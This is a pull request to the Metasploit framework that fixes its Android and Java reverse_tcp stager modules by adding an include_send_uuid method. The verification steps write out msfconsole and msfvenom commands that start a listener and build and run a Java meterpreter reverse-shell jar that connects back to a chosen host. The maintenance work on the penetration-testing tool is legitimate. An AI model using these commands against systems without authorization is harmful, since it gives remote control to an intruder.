### PR TITLE
fix android/java reverse_tcp

### DIFF
--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -28,6 +28,10 @@ module Metasploit3
     ))
   end
 
+  def include_send_uuid
+      false
+  end
+
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
 

--- a/modules/payloads/stagers/java/reverse_tcp.rb
+++ b/modules/payloads/stagers/java/reverse_tcp.rb
@@ -41,6 +41,10 @@ module Metasploit3
     @class_files = [ ]
   end
 
+  def include_send_uuid
+      false
+  end
+
   def config
     spawn = datastore["Spawn"] || 2
     c =  ""


### PR DESCRIPTION
quick fix for the reverse_tcp stagers after https://github.com/rapid7/metasploit-framework/pull/5367
from ~/.msf4/logs/framework.log:

```
[06/02/2015 10:53:42] [e(0)] core: Exception raised from handle_connection: NameError: undefined local variable or method `include_send_uuid' for #<#<Class:0x00000006674bd8>:0x00000003d94128>
./lib/msf/core/payload/stager.rb:161:in `handle_connection'
```

stagers with include_send_uuid=true will be coming soon.
Verification:
- [x] Create a java (or android handler:)

```
./msfconsole -qx "use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
```
- [x] Ensure you get a working session after running:

```
./msfvenom -p java/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o met.jar
java -jar met.jar
```
